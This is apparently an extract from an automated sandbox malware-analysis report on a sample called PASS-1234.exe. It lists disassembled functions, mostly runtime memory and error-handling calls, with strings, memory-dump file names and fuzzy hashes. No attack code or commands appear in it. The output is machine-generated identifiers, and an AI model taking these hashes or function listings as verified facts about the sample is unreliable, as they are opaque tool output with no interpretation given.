Part of subcall function 6D397797: _free.LIBCMT ref: 6D39788C

_free.LIBCMT ref: 6D3958A1

Part of subcall function 6D393183: HeapFree.KERNEL32(00000000,00000000,?,6D3923BC), ref: 6D393199
Part of subcall function 6D393183: GetLastError.KERNEL32(?,?,6D3923BC), ref: 6D3931AB

_free.LIBCMT ref: 6D3958C3
_free.LIBCMT ref: 6D3958D8
_free.LIBCMT ref: 6D3958E3
_free.LIBCMT ref: 6D395905
_free.LIBCMT ref: 6D395918
_free.LIBCMT ref: 6D395926
_free.LIBCMT ref: 6D395931
_free.LIBCMT ref: 6D395969
_free.LIBCMT ref: 6D395970
_free.LIBCMT ref: 6D39598D
_free.LIBCMT ref: 6D3959A5

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 9749e0ba5c9d694186ecf24450497a8aec64d862ebaf33b4a3548cdbdb801233
Instruction ID: 6dd9b6b4aa18a570cd040d7f2346fbfe23b1c46116ef95363afe27109bc625d9
Opcode Fuzzy Hash: 9749e0ba5c9d694186ecf24450497a8aec64d862ebaf33b4a3548cdbdb801233
Instruction Fuzzy Hash: 3D319371608302AFEB116A38D805B7673F5EF01365F11892AE1AADF160FF75E981C714

Function 6D392A43 Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6D392A59

Part of subcall function 6D393183: HeapFree.KERNEL32(00000000,00000000,?,6D3923BC), ref: 6D393199
Part of subcall function 6D393183: GetLastError.KERNEL32(?,?,6D3923BC), ref: 6D3931AB

_free.LIBCMT ref: 6D392A65
_free.LIBCMT ref: 6D392A70
_free.LIBCMT ref: 6D392A7B
_free.LIBCMT ref: 6D392A86
_free.LIBCMT ref: 6D392A91
_free.LIBCMT ref: 6D392A9C
_free.LIBCMT ref: 6D392AA7
_free.LIBCMT ref: 6D392AB2
_free.LIBCMT ref: 6D392AC0

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 27600d443cff6c09df0082e235022af0a30e69da0eb4b98af7b7fdca44549c9c
Instruction ID: e81c83628662fad89f9a60504ed73efb5fae73897ca4848f0c3b0be4fb5570fe
Opcode Fuzzy Hash: 27600d443cff6c09df0082e235022af0a30e69da0eb4b98af7b7fdca44549c9c
Instruction Fuzzy Hash: A52198BAD08108BFCB41EF94C880DDD7BB9EF09244F45856AA65A9F120EB75DA44CBC4

Function 00BDC690 Relevance: 11.5, Strings: 9, Instructions: 236
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

<], xrefs: 00BDC6C0
Z31], xrefs: 00BDC719
x, xrefs: 00BDC88F
_FYl, xrefs: 00BDC79E
VPYY, xrefs: 00BDC70E
1CHJ, xrefs: 00BDC724
TKzT, xrefs: 00BDC86F
XXG^, xrefs: 00BDC7A9
BkVU, xrefs: 00BDC864

Memory Dump Source

Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd

Similarity

API ID:
String ID: 1CHJ$<]$BkVU$TKzT$VPYY$XXG^$Z31]$_FYl$x
API String ID: 0-4215879068
Opcode ID: a5ab305e1d916021bca556b1b4b433be02a434a025c7ec72534bc3616dcb9974
Instruction ID: 2360ef39e6f0823c6240f7a5ead9ce855095e45dc598c745b31fb0a60f8670b1
Opcode Fuzzy Hash: a5ab305e1d916021bca556b1b4b433be02a434a025c7ec72534bc3616dcb9974
Instruction Fuzzy Hash: 52718AB401D3C28BE7368F2584207EBFFE1AB92714F18499EC4D99B352DB39440ACB56

Function 6D391020 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_ValidateLocalCookies.LIBCMT ref: 6D391057
___except_validate_context_record.LIBVCRUNTIME ref: 6D39105F
_ValidateLocalCookies.LIBCMT ref: 6D3910E8
__IsNonwritableInCurrentImage.LIBCMT ref: 6D391113
_ValidateLocalCookies.LIBCMT ref: 6D391168

Strings

csm, xrefs: 6D3910FD

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: ca98ba234f525c5365173e5afb2ce11b4df05ee3bbccde9ee02dcdcbbb3d6553
Instruction ID: 4abf53f205fa1ac067788e90e9c26cee274c854c1d0b589a62a35e2f4d9161c3
Opcode Fuzzy Hash: ca98ba234f525c5365173e5afb2ce11b4df05ee3bbccde9ee02dcdcbbb3d6553
Instruction Fuzzy Hash: A641D634904249AFCF00CF69C880A9E7BB9BF45358F00C165E914AF355E7339A15CF91

Function 6D3939EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON

Download Yara Rule

Strings

};9m, xrefs: 6D393A40
C:\Users\user\Desktop\PASS-1234.exe, xrefs: 6D3939F4

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID:
String ID: C:\Users\user\Desktop\PASS-1234.exe$};9m
API String ID: 0-731360590
Opcode ID: e310323ed42278b142b3ce94f77b87294d6ca90d77fb7c983740a941e725482c
Instruction ID: 1ff7ab5741e40b24dbfd242fd4ce8fd124da7c6fa463977b2a7d8b1d2f456e5d
Opcode Fuzzy Hash: e310323ed42278b142b3ce94f77b87294d6ca90d77fb7c983740a941e725482c
Instruction Fuzzy Hash: 6921BEF1618206BF9B50AB688C80D6B77BDAF013687018615FA6D9F250F732DC4087A0

Function 6D3946AA Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Strings

ext-ms-, xrefs: 6D394715
api-ms-, xrefs: 6D394701

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID:
String ID: api-ms-$ext-ms-
API String ID: 0-537541572
Opcode ID: e6d81e6d8ceac1f36be60ddc1287c43ec5e84a906a119c48a198f5c5375521c8
Instruction ID: 99476b738a296b4b8dabeae2ccabeea815aa31d4dc66fe49134c39c9eea30b57
Opcode Fuzzy Hash: e6d81e6d8ceac1f36be60ddc1287c43ec5e84a906a119c48a198f5c5375521c8
Instruction Fuzzy Hash: 8021AB35945216FBDB228A249C45B6A376CAB4B764B114210F935AF281F732D900C5F8

Function 6D397936 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D3978FE: _free.LIBCMT ref: 6D397923

_free.LIBCMT ref: 6D397984

Part of subcall function 6D393183: HeapFree.KERNEL32(00000000,00000000,?,6D3923BC), ref: 6D393199
Part of subcall function 6D393183: GetLastError.KERNEL32(?,?,6D3923BC), ref: 6D3931AB

_free.LIBCMT ref: 6D39798F
_free.LIBCMT ref: 6D39799A
_free.LIBCMT ref: 6D3979EE
_free.LIBCMT ref: 6D3979F9
_free.LIBCMT ref: 6D397A04
_free.LIBCMT ref: 6D397A0F

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction ID: 85ffb057c7b0ed0842c30d70d09c723d4ba4d52b3908634e66f663cfaa820c96
Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction Fuzzy Hash: EB1124B1948B04B6E520AB70CC06FCB779C9F09B05F558C19A3DE6E5A0EB69B506C790

Function 6D396A4F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6D396A97
__fassign.LIBCMT ref: 6D396C7C
__fassign.LIBCMT ref: 6D396C99
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D396CE1
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D396D21
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D396DC9

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 9bcaf38c5f1bfee8a98dc865b82916436ff61934ea349ed5a289ed78bcb88c2c
Instruction ID: 7fbb1ad03dcc9ea23f99ea2e417a25e036f5248d5ed820804665f8c205d7d859
Opcode Fuzzy Hash: 9bcaf38c5f1bfee8a98dc865b82916436ff61934ea349ed5a289ed78bcb88c2c
Instruction Fuzzy Hash: 6EC1B375D052589FDF11CFA8C880AEDBBB9FF09314F14816AE965BB241E7319906CFA0

Function 6D3914F7 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6D3911C5,6D3902F0,6D38FD09,?,6D38FF41,?,00000001,?,?,00000001,?,6D39F120,0000000C,6D39003A), ref: 6D391505
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D391513
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D39152C
SetLastError.KERNEL32(00000000,6D38FF41,?,00000001,?,?,00000001,?,6D39F120,0000000C,6D39003A,?,00000001,?), ref: 6D39157E

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ee96815d4567db597f1598c9f7cb6ca29d1cabb71b9639c7e0addbcee4f572e7
Instruction ID: 6764e120e59463e7a9ab2a8d64dd55a6b3b2e3e6b157ebeec32a4e138548f949
Opcode Fuzzy Hash: ee96815d4567db597f1598c9f7cb6ca29d1cabb71b9639c7e0addbcee4f572e7
Instruction Fuzzy Hash: 4E01D83750C7176DEA1606789C86A762BBCDB0767D322033AF265BD1E0FF1348416540

Function 6D391673 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6D391734,00000000,?,00000001,00000000,?,6D3917AB,00000001,FlsFree,6D39AD3C,FlsFree,00000000), ref: 6D391703

Strings

api-ms-, xrefs: 6D3916C3

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: da42f23fc2130ed0175db5eb529a588f2337973f3c2a1ff284a8d729954366c9
Instruction ID: 834657c50f7c09c416c82faa638f44fdc9f8c83960d2f36bb44a3e5df346e943
Opcode Fuzzy Hash: da42f23fc2130ed0175db5eb529a588f2337973f3c2a1ff284a8d729954366c9
Instruction Fuzzy Hash: DA113332E45626ABDB228B688C45B5D77BCAF02764F190251ED15FF280F772ED008AE5

Function 6D391D2A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6D391CDC,?,?,6D391CA4,?,00000001,?), ref: 6D391D3F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6D391D52
FreeLibrary.KERNEL32(00000000,?,?,6D391CDC,?,?,6D391CA4,?,00000001,?), ref: 6D391D75

Strings

mscoree.dll, xrefs: 6D391D38
CorExitProcess, xrefs: 6D391D4A

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 8cc9662c10f96da8a15ed0bd850170575862577527ce2b72bd9cbe98f03cb728
Instruction ID: bc18f292104e18b5257207caf02cf4de1cd0502fe54a7ddc3b8d8cb2124157ed
Opcode Fuzzy Hash: 8cc9662c10f96da8a15ed0bd850170575862577527ce2b72bd9cbe98f03cb728
Instruction Fuzzy Hash: 8FF01C31D01519FBDF11AB91CD0AFAE7ABDEB41756F100164E411BA250EB368E00DB90

Function 6D396347 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 6D3963CB
__alloca_probe_16.LIBCMT ref: 6D396491
__freea.LIBCMT ref: 6D3964FD

Part of subcall function 6D3954FC: HeapAlloc.KERNEL32(00000000,3R9m,6D395233,?,6D393F33,00000220,?,6D395233,?,?,?,?,6D397351,00000001,?,?), ref: 6D39552E

__freea.LIBCMT ref: 6D396506
__freea.LIBCMT ref: 6D396529

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 31823802340b070b4716f77624472a4c4482c3ed44ea15ec1e0477f72f3f9f20
Instruction ID: c0b077ae89d7ce7eb53dbe376c0f8fb69ae79de9d72e29abac2e352e95d8fd5a
Opcode Fuzzy Hash: 31823802340b070b4716f77624472a4c4482c3ed44ea15ec1e0477f72f3f9f20
Instruction Fuzzy Hash: 48518272505217AFEB118EA48C81EBF3AA9EF45664F128129FE18AF150F736DC5186E0

Function 6D397895 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6D3978AD

Part of subcall function 6D393183: HeapFree.KERNEL32(00000000,00000000,?,6D3923BC), ref: 6D393199
Part of subcall function 6D393183: GetLastError.KERNEL32(?,?,6D3923BC), ref: 6D3931AB

_free.LIBCMT ref: 6D3978BF
_free.LIBCMT ref: 6D3978D1
_free.LIBCMT ref: 6D3978E3
_free.LIBCMT ref: 6D3978F5

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 8530465f19b6bc310d92d9edc67c668dc73b557a59368ef40eb4e6da03580208
Instruction ID: 6f0eed2b683fe23e506ec7119ce0c769db79a03258197d02d51f7045011ff45b
Opcode Fuzzy Hash: 8530465f19b6bc310d92d9edc67c668dc73b557a59368ef40eb4e6da03580208
Instruction Fuzzy Hash: F0F044B190C306A7CB11DA65D486D2737EEEE013117554C0AF1A9DF580E775F881C6D4

Function 6D393373 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D39350D

Strings

*?, xrefs: 6D3933B6

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
Instruction ID: e12048273d6fd40b29667b130cf615e71829ff7d1d58b98d077e669bb807ec31
Opcode Fuzzy Hash: 94637f4be4f3376c3c73e86559238b3eb3b83d9d35241fd0efc8265dbc0da022
Instruction Fuzzy Hash: B3617CB5D0421A9FCB15CFA9C8815EEFBF5EF48314B15816AD959EB300E731AE41CB90

Function 6D3972BC Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 170fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D396A4F: GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6D396A97

WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,6D395233,?,00000000,00000000,6D39F360,0000002C,6D3952A4,?), ref: 6D397402
GetLastError.KERNEL32 ref: 6D39740C
__dosmaperr.LIBCMT ref: 6D39744B

Strings

3R9m, xrefs: 6D3973ED, 6D3973DC, 6D3973CC, 6D3973BC, 6D39737F, 6D397368, 6D39736C, 6D397384, 6D3973C1, 6D3973D1, 6D3973E1

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
String ID: 3R9m
API String ID: 910155933-2439373522
Opcode ID: 12b1adbc5dab4cfb4afa4ad75c78e4037deedc67d1aeea96cc42107fa07fae4a
Instruction ID: 1041dcdfb19cea7d7418e2e7e5059ab4208663f35bb7e5b2b439a240ecfe6e51
Opcode Fuzzy Hash: 12b1adbc5dab4cfb4afa4ad75c78e4037deedc67d1aeea96cc42107fa07fae4a
Instruction Fuzzy Hash: 0B51D6F1E1410AABDB028FA8C842FEE7FB8AF46314F154055EA54AF1D1F7729941CBA0

Function 6D393287 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6D3938A9: _free.LIBCMT ref: 6D3938B7

Part of subcall function 6D39447D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6D3964F3,?,00000000,00000000), ref: 6D394529

GetLastError.KERNEL32 ref: 6D3932EF
__dosmaperr.LIBCMT ref: 6D3932F6
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D393335
__dosmaperr.LIBCMT ref: 6D39333C

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 55a141dfa2e517a5e154993d6b9770a1209c4a902192e1697aba8bab13038817
Instruction ID: 1d6b5f1b286697efb9bbe24f3723898faee2776509820cec9ef27c2a36a85d3f
Opcode Fuzzy Hash: 55a141dfa2e517a5e154993d6b9770a1209c4a902192e1697aba8bab13038817
Instruction Fuzzy Hash: 0B2165F1648206AF9B115FA5CC81D6B77ACEF053687058514E6ADDF650FB32EC0087A0

Function 6D392B87 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6D396E97,?,00000001,6D3952A4,?,6D397351,00000001,?,?,?,6D395233,?,00000000), ref: 6D392B8C
_free.LIBCMT ref: 6D392BE9
_free.LIBCMT ref: 6D392C1F
SetLastError.KERNEL32(00000000,00000013,000000FF,?,6D397351,00000001,?,?,?,6D395233,?,00000000,00000000,6D39F360,0000002C,6D3952A4), ref: 6D392C2A

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 949f78bacf387d37893675666281bde7e323133b032fc4a6ec8671023c2aa134
Instruction ID: b87e38c9f670a3ca7cadf5001ead26f7e82fd99873ba310481b678edbcb29b9b
Opcode Fuzzy Hash: 949f78bacf387d37893675666281bde7e323133b032fc4a6ec8671023c2aa134
Instruction Fuzzy Hash: 8E11A77A20DE063EDB2216785D81E2B26ADABC626C7664735F7349E2D0FF6388054614

Function 6D392CDE Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000001,6D393118,6D3931A9,?,?,6D3923BC), ref: 6D392CE3
_free.LIBCMT ref: 6D392D40
_free.LIBCMT ref: 6D392D76
SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,6D393118,6D3931A9,?,?,6D3923BC), ref: 6D392D81

Memory Dump Source

Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true

Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 503276cdf07d302b5b9899fd08790c0af04dc3eedd6def1cf6bd6977a983a17f
